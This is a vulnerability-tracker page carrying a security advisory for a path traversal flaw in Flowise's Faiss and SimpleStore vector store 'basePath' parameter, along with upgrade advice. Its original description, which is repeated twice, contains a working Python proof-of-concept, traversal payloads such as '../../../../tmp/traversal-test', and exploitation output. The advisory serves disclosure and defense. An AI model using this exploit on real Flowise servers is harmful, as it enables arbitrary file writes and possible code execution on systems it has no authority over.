Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
7.3
Flowise: Unsecured File System Writes in Vector Store
GHSA-w6v6-49gh-mc9w
Summary
An attacker with proper credentials can write files to the server's file system. This occurs when an authenticated user provides a custom 'basePath' that is not properly validated. To fix this, ensure that the 'basePath' parameter is validated and sanitized before writing to the file system. Update your Flowise configuration to prevent unauthorized file access.
What to do
- Update henryheng flowise to version 3.1.0.
- Update henryheng flowise-components to version 3.1.0.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | henryheng | flowise |
< 3.1.0 Fix: upgrade to 3.1.0
|
| npm | henryheng | flowise-components |
< 3.1.0 Fix: upgrade to 3.1.0
|
Original title
Flowise: Path Traversal in Vector Store basePath
Original description
## Summary
The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.
## Vulnerability Details
| Field | Value |
|-------|-------|
| Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) |
| Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) |
## Prerequisites
1. **Authentication**: Valid API token with `documentStores:upsert-config` permission
2. **Document Store**: An existing Document Store with at least one processed chunk
3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key)
## Root Cause
### Faiss (`Faiss.ts`)
```typescript
async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
const basePath = nodeData.inputs?.basePath as string // User-controlled
// ...
const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)
await vectorStore.save(basePath) // Direct filesystem write, no validation
}
```
### SimpleStore (`SimpleStore.ts`)
```typescript
async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
const basePath = nodeData.inputs?.basePath as string // User-controlled
let filePath = ''
if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex')
else filePath = basePath // Used directly without sanitization
const storageContext = await storageContextFromDefaults({ persistDir: filePath }) // Writes to arbitrary path
}
```
## Impact
An authenticated attacker can:
1. **Write files to arbitrary locations** on the server filesystem
2. **Overwrite existing files** if the process has write permissions
3. **Potential for code execution** by writing to web-accessible directories or startup scripts
4. **Data exfiltration** by writing to network-mounted filesystems
## Proof of Concept
### poc.py
```python
#!/usr/bin/env python3
"""
POC: Path Traversal in Vector Store basePath (CWE-22)
Usage:
python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID>
"""
import argparse
import json
import urllib.request
import urllib.error
def post_json(url, data, headers):
req = urllib.request.Request(
url,
data=json.dumps(data).encode("utf-8"),
headers={**headers, "Content-Type": "application/json"},
method="POST",
)
with urllib.request.urlopen(req, timeout=120) as resp:
return resp.status, resp.read().decode("utf-8", errors="replace")
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--target", required=True)
ap.add_argument("--token", required=True)
ap.add_argument("--store-id", required=True)
ap.add_argument("--credential", required=True)
ap.add_argument("--base-path", default="/tmp/flowise-path-traversal-poc")
args = ap.parse_args()
payload = {
"storeId": args.store_id,
"vectorStoreName": "faiss",
"vectorStoreConfig": {"basePath": args.base_path},
"embeddingName": "openAIEmbeddings",
"embeddingConfig": {"credential": args.credential},
}
url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert"
headers = {"Authorization": f"Bearer {args.token}"}
try:
status, body = post_json(url, payload, headers)
print(body)
except urllib.error.HTTPError as e:
print(e.read().decode())
if __name__ == "__main__":
main()
```
### Setup
1. Create a Document Store in Flowise UI
2. Add a Document Loader (e.g., Plain Text) with any content
3. Click "Process" to create chunks
4. Note the Store ID from the URL
5. Get your embedding credential ID from Settings → Credentials
### Exploitation
```bash
# Write to /tmp
python poc.py \
--target http://127.0.0.1:3000 \
--token <API_TOKEN> \
--store-id <STORE_ID> \
--credential <OPENAI_CREDENTIAL_ID> \
--base-path /tmp/flowise-pwned
# Path traversal variant
python poc.py \
--target http://127.0.0.1:3000 \
--token <API_TOKEN> \
--store-id <STORE_ID> \
--credential <OPENAI_CREDENTIAL_ID> \
--base-path "../../../../tmp/traversal-test"
```
### Evidence
```
$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned
{"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]}
$ ls -la /tmp/flowise-pwned/
total 16
drwxr-xr-x 4 user wheel 128 Jan 17 12:00 .
drwxrwxrwt 12 root wheel 384 Jan 17 12:00 ..
-rw-r--r-- 1 user wheel 1234 Jan 17 12:00 docstore.json
-rw-r--r-- 1 user wheel 5678 Jan 17 12:00 faiss.index
```
The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.
## Vulnerability Details
| Field | Value |
|-------|-------|
| Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) |
| Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) |
## Prerequisites
1. **Authentication**: Valid API token with `documentStores:upsert-config` permission
2. **Document Store**: An existing Document Store with at least one processed chunk
3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key)
## Root Cause
### Faiss (`Faiss.ts`)
```typescript
async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
const basePath = nodeData.inputs?.basePath as string // User-controlled
// ...
const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)
await vectorStore.save(basePath) // Direct filesystem write, no validation
}
```
### SimpleStore (`SimpleStore.ts`)
```typescript
async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
const basePath = nodeData.inputs?.basePath as string // User-controlled
let filePath = ''
if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex')
else filePath = basePath // Used directly without sanitization
const storageContext = await storageContextFromDefaults({ persistDir: filePath }) // Writes to arbitrary path
}
```
## Impact
An authenticated attacker can:
1. **Write files to arbitrary locations** on the server filesystem
2. **Overwrite existing files** if the process has write permissions
3. **Potential for code execution** by writing to web-accessible directories or startup scripts
4. **Data exfiltration** by writing to network-mounted filesystems
## Proof of Concept
### poc.py
```python
#!/usr/bin/env python3
"""
POC: Path Traversal in Vector Store basePath (CWE-22)
Usage:
python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID>
"""
import argparse
import json
import urllib.request
import urllib.error
def post_json(url, data, headers):
req = urllib.request.Request(
url,
data=json.dumps(data).encode("utf-8"),
headers={**headers, "Content-Type": "application/json"},
method="POST",
)
with urllib.request.urlopen(req, timeout=120) as resp:
return resp.status, resp.read().decode("utf-8", errors="replace")
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--target", required=True)
ap.add_argument("--token", required=True)
ap.add_argument("--store-id", required=True)
ap.add_argument("--credential", required=True)
ap.add_argument("--base-path", default="/tmp/flowise-path-traversal-poc")
args = ap.parse_args()
payload = {
"storeId": args.store_id,
"vectorStoreName": "faiss",
"vectorStoreConfig": {"basePath": args.base_path},
"embeddingName": "openAIEmbeddings",
"embeddingConfig": {"credential": args.credential},
}
url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert"
headers = {"Authorization": f"Bearer {args.token}"}
try:
status, body = post_json(url, payload, headers)
print(body)
except urllib.error.HTTPError as e:
print(e.read().decode())
if __name__ == "__main__":
main()
```
### Setup
1. Create a Document Store in Flowise UI
2. Add a Document Loader (e.g., Plain Text) with any content
3. Click "Process" to create chunks
4. Note the Store ID from the URL
5. Get your embedding credential ID from Settings → Credentials
### Exploitation
```bash
# Write to /tmp
python poc.py \
--target http://127.0.0.1:3000 \
--token <API_TOKEN> \
--store-id <STORE_ID> \
--credential <OPENAI_CREDENTIAL_ID> \
--base-path /tmp/flowise-pwned
# Path traversal variant
python poc.py \
--target http://127.0.0.1:3000 \
--token <API_TOKEN> \
--store-id <STORE_ID> \
--credential <OPENAI_CREDENTIAL_ID> \
--base-path "../../../../tmp/traversal-test"
```
### Evidence
```
$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned
{"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]}
$ ls -la /tmp/flowise-pwned/
total 16
drwxr-xr-x 4 user wheel 128 Jan 17 12:00 .
drwxrwxrwt 12 root wheel 384 Jan 17 12:00 ..
-rw-r--r-- 1 user wheel 1234 Jan 17 12:00 docstore.json
-rw-r--r-- 1 user wheel 5678 Jan 17 12:00 faiss.index
```
osv CVSS4.0
7.3
Vulnerability type
CWE-22
Path Traversal
Published: 16 Apr 2026 · Updated: 16 Apr 2026 · First seen: 16 Apr 2026